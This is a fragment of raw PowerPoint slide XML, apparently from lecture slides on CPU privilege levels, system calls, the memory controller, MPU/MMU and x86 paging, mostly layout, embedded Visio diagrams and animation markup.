      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3727557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r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>Memory Controller</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1026" name="Object 7"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3884826834"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="906463" y="1982788"/>
          <a:ext cx="7327900" cy="4111625"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s38916" name="Visio" r:id="rId3" imgW="3454676" imgH="1939047" progId="Visio.Drawing.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId3" imgW="3454676" imgH="1939047" progId="Visio.Drawing.11">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name=""/>
                      <p:cNvPicPr>
                        <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                      </p:cNvPicPr>
                      <p:nvPr/>
                    </p:nvPicPr>
                    <p:blipFill>
                      <a:blip r:embed="rId4"/>
                      <a:srcRect/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </p:blipFill>
                    <p:spPr bwMode="auto">
                      <a:xfrm>
                        <a:off x="906463" y="1982788"/>
                        <a:ext cx="7327900" cy="4111625"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="226782624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Privileged Mode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Aka ring 0 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Ring 3) or Kernel mode (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> user mode)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A state of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>CPU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> where certain CPU instructions are allowed which are not allowed in non-privileged mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>memory controller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is also aware of the CPU state and makes decisions based on this state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The code that is executing in this CPU mode is called the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>kernel</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22028383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b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>system call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is a mechanism for a non-privileged code to call the kernel to perform some service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mechanisms:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Software interrupt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“call gate”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Special CPU instructions (SYSTENTER)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>All mechanisms </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>switch the CPU mode to the privileged mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>set the IP to some location in the kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26591160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Protection Unit / Memory Management Unit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>MPU/MMU </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>refers to the “smart” capabilities of the memory controller</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A simple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>MPU </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>would include a few range registers, and ability to mark the privilege level required to access each range</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>MMU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> would include extensive support for more advanced capabilities, such as paging, segmentation and virtual memory</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20348859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Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>memory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is divided to equal sized chunks - pages </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(x86 - 4KB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Page </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>tables map linear address to physical. Keeping track of:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Valid pages, not existing pages, page </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>attributes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="354484712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3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="3048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defTabSz="909638">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Page Translation Mechanism (4KB)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="709636" name="Object 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="304800" y="1752600"/>
          <a:ext cx="1928813" cy="3657600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s39948" name="Visio" r:id="rId4" imgW="2168652" imgH="3717036" progId="Visio.Drawing.6">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId4" imgW="2168652" imgH="371703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52600"/>
                        <a:ext cx="192881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9638" name="Object 6"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2209800" y="2362200"/>
          <a:ext cx="2354263" cy="3657600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s39949" name="Visio" r:id="rId6" imgW="2362200" imgH="3625901" progId="Visio.Drawing.6">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId6" imgW="2362200" imgH="3625901"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2362200"/>
                        <a:ext cx="235426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9639" name="Object 7"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4502150" y="2470150"/>
          <a:ext cx="1974850" cy="2787650"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s39950" name="Visio" r:id="rId8" imgW="1975104" imgH="2788006" progId="Visio.Drawing.6">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId8" imgW="1975104" imgH="278800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2150" y="2470150"/>
                        <a:ext cx="197485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9640" name="Object 8"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6400800" y="2470150"/>
          <a:ext cx="2362200" cy="2787650"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s39951" name="Visio" r:id="rId10" imgW="2362200" imgH="2788006" progId="Visio.Drawing.6">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId10" imgW="2362200" imgH="2788006"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0800" y="2470150"/>
                        <a:ext cx="23622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0"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828800" y="1371600"/>
            <a:ext cx="6454775" cy="1716088"/>
            <a:chOff x="1152" y="864"/>
            <a:chExt cx="4066" cy="1081"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="25606" name="Object 5"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="1152" y="1104"/>
            <a:ext cx="4066" cy="841"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s39952" name="Visio" r:id="rId12" imgW="6335573" imgH="1496873" progId="Visio.Drawing.6">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Visio" r:id="rId12" imgW="6335573" imgH="1496873"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2" y="1104"/>
                          <a:ext cx="4066" cy="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9" name="Text Box 9"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1968" y="864"/>
              <a:ext cx="32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defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" charset="0"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:defRPr>
              </a:lvl1pPr>
              <a:lvl2pPr marL="742950" indent="-285750">
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" charset="0"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:defRPr>
              </a:lvl2pPr>
              <a:lvl3pPr marL="1143000" indent="-228600">
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" charset="0"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:defRPr>
              </a:lvl3pPr>
              <a:lvl4pPr marL="1600200" indent="-228600">
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" charset="0"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:defRPr>
              </a:lvl4pPr>
              <a:lvl5pPr marL="2057400" indent="-228600">
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" charset="0"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:defRPr>
              </a:lvl5pPr>
              <a:lvl6pPr marL="2514600" indent="-228600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" charset="0"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:defRPr>
              </a:lvl6pPr>
              <a:lvl7pPr marL="2971800" indent="-228600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" charset="0"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:defRPr>
              </a:lvl7pPr>
              <a:lvl8pPr marL="3429000" indent="-228600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" charset="0"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:defRPr>
              </a:lvl8pPr>
              <a:lvl9pPr marL="3886200" indent="-228600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" charset="0"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:defRPr>
              </a:lvl9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr algn="ctr">
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>Linear Address</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="143257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9636"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(up)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="709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09638"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(up)">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7096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09639"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7096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09640"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="70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958340" y="6324600"/>
            <a:ext cx="63246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958340" y="6172200"/>
            <a:ext cx="76454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960880" y="6019800"/>
            <a:ext cx="108712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971040" y="5486400"/>
            <a:ext cx="61976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981200" y="5334000"/>
            <a:ext cx="30480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81200" y="3268980"/>
            <a:ext cx="53340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81200" y="3116580"/>
            <a:ext cx="74168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981200" y="2971800"/>
            <a:ext cx="106680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981200" y="2438400"/>
            <a:ext cx="762000" cy="1524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650" name="Object 2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2252654846"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1905000" y="297180"/>
          <a:ext cx="5302250" cy="6248400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s40964" name="Visio" r:id="rId4" imgW="6264250" imgH="7491374" progId="Visio.Drawing.6">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId4" imgW="6264250" imgH="749137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97180"/>
                        <a:ext cx="530225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9563495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 Usages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Isolation – marking pages that are accessible to R0 vs. R3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Protection – marking pages as read-only or non-executable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sharing – creating multiple code/data pages that point to the same physical address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Virtual memory – Have every process “feel” as if they have access to 4GB of memory  but limit their physical memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Swapping</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3067533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286000" y="1676400"/>
            <a:ext cx="4214813" cy="4572000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Century Gothic" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13315" name="Rectangle 3"/>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en-US" sz="2400">
              <a:latin typeface="Century Gothic" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13316" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6119813" y="5986463"/>
            <a:ext cx="381000" cy="263525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="folHlink"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:latin typeface="Times"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13317" name="Rectangle 6"/>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en-US" sz="2400">
              <a:latin typeface="Century Gothic" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13318" name="Line 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2292350" y="32432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10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2292350" y="3517900"/>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0" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2292350" y="3792538"/>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1" name="Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2292350" y="406717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2" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2292350" y="5164138"/>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3" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2292350" y="543877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4" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
